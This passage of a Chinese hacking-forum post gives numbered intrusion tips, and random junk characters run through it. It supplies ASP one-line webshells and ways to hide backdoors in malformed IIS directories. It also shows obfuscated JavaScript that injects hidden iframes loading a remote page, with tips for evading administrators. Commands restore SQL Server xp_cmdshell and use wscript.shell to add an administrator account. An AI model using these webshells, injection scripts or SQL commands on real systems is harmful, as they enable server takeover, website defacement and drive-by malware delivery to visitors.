9 f7 O1 v. [' O; d2 Q4 A- }- C1 b, k2 Rd).<script language=VBScript runat=server>execute request("sb")</Script>  @8 M& Z, @: C1 C! E2 s
e).<%25Execute(request("l"))%25>6 R+ M  g8 g7 G) R' m
f).<%if request("cmd")<>"" then execute request("pass")%>/ }: f  h, }7 e* m0 R
/ X7 M, z5 y( S3 P1 C8 [5 C, \
52、at "12:17" /interactive cmd
& `# W, W: d7 p, s, g执行后可以用AT命令查看新加的任务0 I: Q9 p  C$ ?! o" r) }
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。% r, X! {1 h: q3 h0 b+ @

! p. ~3 O/ @9 ?) k$ p3 d53、隐藏ASP后门的两种方法; Q5 ]! o! m; j& ~5 Z( V
1、建立非标准目录:mkdir images..\
/ a: D( \" ^* \: h4 T拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
4 `4 Z5 {, _8 H# Y" F7 y; i7 |通过web访问ASP木马:http://ip/images../news.asp?action=login
: K6 b! Q( b3 D# ?如何删除非标准目录:rmdir images..\ /s: G0 O  x" ?, e! P! ?
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 y9 t) @1 F3 l: n: zmkdir programme.asp( g+ l& [  ?- G* T- }5 K
新建1.txt文件内容:<!--#include file=”12.jpg”-->8 d1 l" m) L. \2 m# w3 N! L9 g6 h
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件1 D6 z5 E9 V: V8 U
attrib +H +S programme.asp2 B( x% Z! c2 O
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt1 j8 G, X1 k+ f, P; Q
2 s) J0 w; U6 w+ S
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。) k% ~. \; S% R/ a# o/ a
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。: r2 G- x1 X  r; X2 r& {! G( L

0 r5 x9 B2 o, ~, C55、JS隐蔽挂马# `3 l: r5 I- d$ v$ c
1.
' n6 {* L/ \/ B% u' A1 x0 wvar tr4c3="<iframe src=ht";
5 P( L: ?' [, z9 Rtr4c3 = tr4c3+"tp:/";6 v$ F% R; L$ }; z5 Y
tr4c3 = tr4c3+"/ww";+ N) ]9 B$ `' D( e- O3 Y8 D
tr4c3 = tr4c3+"w.tr4";
& Z2 ~( G+ G( N  S/ t/ Htr4c3 = tr4c3+"c3.com/inc/m";
9 t3 C) \0 H% j; V- c, `9 Itr4c3 = tr4c3+"m.htm style="display:none"></i";' p+ y- v8 g* Z; A, E0 \
tr4c3 =tr4c3+"frame>'";* y3 \$ J5 g& K! E/ Q! G2 b
document.write(tr4c3);
, e) t" G% }$ P' C8 r- a5 c避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。% T/ H- D# q$ g$ h9 b

3 d; v3 y7 E, C2 n' i2.
. T. ^  ~, P$ k8 y0 W% Y  ]转换进制,然后用EVAL执行。如
# m3 o6 O0 D- w9 G! _7 i* teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; T5 L0 O% I" s5 N5 G% \4 ^2 p
不过这个有点显眼。
4 |! j( _1 |1 [* V6 ^% g3 w: `3.
" ~8 M8 i3 q9 Qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');' F& L& A8 t! |) D! k
最后一点,别忘了把文件的时间也修改下。. M; q6 _5 _: q& `+ o; X+ F( h' u6 X
, {  S. M+ x! j: m+ S' z( o8 A' ]8 D$ \
56.3389终端入侵常用DOS命令
0 M) }1 M% z6 h+ \7 H2 L& `taskkill taskkill /PID 1248 /t1 H1 m- h, p, F. @, W0 u# p
4 v6 o: {3 r( H8 r7 @. r
tasklist 查进程
1 z& ]* ^) P  K, i; P/ W" W5 F! O2 b* ~& m2 n2 U& u% D/ x/ F
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限% E1 C& w( _( c7 E3 X0 s6 U
iisreset /reboot2 m( ?+ }/ Y* N; B% g
tsshutdn /reboot /delay:1    重起服务器7 W) l3 Q+ `0 ~

4 T  F. K: o) x1 V- e; ]2 W. I" Klogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
% ]; k$ x% t/ g* o2 a+ J* {9 s+ j$ r: Y, y1 ]
query user 查看当前终端用户在线情况
  v$ ^* z: j) W, W$ ^
. ^9 H" W, Q) i5 R8 Z要显示有关所有会话使用的进程的信息,请键入:query process *4 t" y2 f; J3 b4 ~

4 X! [3 f# C" G+ T( W0 }. ^  A; }2 D要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ r! d0 R" N! v3 e8 q/ m& R7 f% w. k
& [- R+ m: Q/ C( n) l" e' o1 p要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2% |2 O* R" u2 Y: `; Y

( [4 c9 p' \* a& \+ y要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02) }  w4 t! z# q2 Q# W* S0 p
, m" Z: c( K3 o( Y
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启8 s6 i( y* `: }3 w' C  ^
6 I+ y; n/ g& J6 Z$ {) Z! y/ X. @
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统  E( b" E/ A; ?+ H+ j4 _
* A. ^5 @* K! D  J8 o; h& m7 `3 H( Q
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。) k7 P2 R* y5 K

$ z) Z4 J$ I# E3 Z命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机( G) g8 [7 z$ O6 W1 B" U. u8 u7 ?

8 T; y: d8 M$ Z  i  G56、在地址栏或按Ctrl+O,输入:
$ S: h8 @2 K6 J2 k, H/ djavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
( m- Y) P% d( |. f
$ E. h- \% ~/ }: h$ T" w! V6 V0 Q源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
4 F7 H- }8 e& V3 q$ S* {( u2 a( c. v( l+ B
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ T- y0 C" B) j* p) l. f
用net localgroup administrators是可以看到管理组下,加了$的用户的。
5 Q2 s: J& r3 k7 T8 d3 I, e) f
9 v# }- ^: u; `+ O+ u58、 sa弱口令相关命令
& ~0 R4 z( ~. w3 y- ^3 k
5 }# B& A5 N! Z' D! x9 K& F一.更改sa口令方法:
. o0 E* b, r: c' v4 i用sql综合利用工具连接后,执行命令:
* o! u1 _; L( g# F& pexec sp_password NULL,'20001001','sa'' P4 n1 I8 }$ j& F3 T' d  I3 K( f
(提示:慎用!)9 {: v" U' b$ o6 M/ c" }2 `
+ V+ `- A7 E' M( k3 k  O" p" E
二.简单修补sa弱口令.
" s" E! o  b+ o- l' H1 ]1 D  d, ?, m3 G* c6 i
方法1:查询分离器连接后执行:
+ E, l7 s# d! z- z2 q6 Cif exists (select * from7 _& t6 e$ r. m: g9 y6 C1 _8 D
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" H  _2 K6 y/ h4 w" p! _! hOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) \6 v7 o4 z1 z, n; [: f
2 z; |% h$ d+ }$ b8 o) @exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'. J3 k/ o5 F8 M0 C* R! u
( ]( T4 l/ C6 ~1 c; Q
GO
' ]! D! J- X0 u5 T" x  ^
6 Z' A. m( v& [# Z然后按F5键命令执行完毕
6 I  \$ \7 w% ]; h* F0 T0 K9 |7 P2 b6 Z5 J$ r0 F3 t
方法2:查询分离器连接后
: M: O2 X7 c+ m. ?9 u. E& i- I+ x第一步执行:use master
7 z/ O* [( M1 @' {, t; @' ?第二步执行:sp_dropextendedproc 'xp_cmdshell'$ n& M0 I0 @7 T/ e5 ~7 r& g' ^
然后按F5键命令执行完毕
# }- V$ v% s. Z$ p  @5 w! b6 @! a2 a! w/ n# w+ F
. P: o5 j: I( b9 _! z4 E5 m5 v
三.常见情况恢复执行xp_cmdshell.
* P+ ~6 N& v1 Z+ Z6 f" P) M5 ~
- @1 n  O4 h, B! R3 M. @9 b) Y+ ^
1 未能找到存储过程'master..xpcmdshell'.% ]+ j/ z+ h+ E. S0 b: i
   恢复方法:查询分离器连接后,
' A: T* M7 Q0 }第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 }6 ^+ }9 J- ~# n/ o- `第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' L1 d3 x; E5 f3 q1 x然后按F5键命令执行完毕1 y  U# H! `" P
8 V; P* g( m8 q
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
4 R) `$ {* }* q; H: p- i) f恢复方法:查询分离器连接后,
5 L& |/ D) f( H9 L2 Q2 M第一步执行:sp_dropextendedproc "xp_cmdshell": j7 o* H3 s- }. N# B6 J9 _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& [) }. v. ~( F
然后按F5键命令执行完毕+ }; M/ s- v" ]% o! y" e
/ T7 q8 q3 U  s8 I+ ~" ^+ q4 o
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
, E* c& [& G, Z% K! u. `: Q恢复方法:查询分离器连接后,
3 R5 Y: X! `1 K5 D8 t第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
- f* ~' t; X) R1 r: h! @6 B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
4 `5 G% B; C$ F! r& ^然后按F5键命令执行完毕
  a/ |- O- `2 o$ G; X- E6 t: g+ ]8 N  V, [( Q# x8 B  `* |
四.终极方法.
" @8 G2 m4 `2 L1 u) q- B( c如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
+ e; Q+ s  r# w1 D查询分离器连接后,4 w7 h" [/ t: k! e4 k
2000servser系统:% {2 L6 l; A  ?: I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
( s$ P2 p3 f3 ~1 E& F$ U: U
& k* c$ u' j  _/ zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
; r" y/ v0 h$ s
/ p  \' X- M9 V3 u; ~0 Exp或2003server系统:
) S* g/ t: G0 a6 z* v9 ]$ M; a. x: \! T4 Y5 n; V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( b9 W& I1 r+ a/ Z
0 _, M5 F: a) m, D  Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# q, D! b5 e+ z1 x$ s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表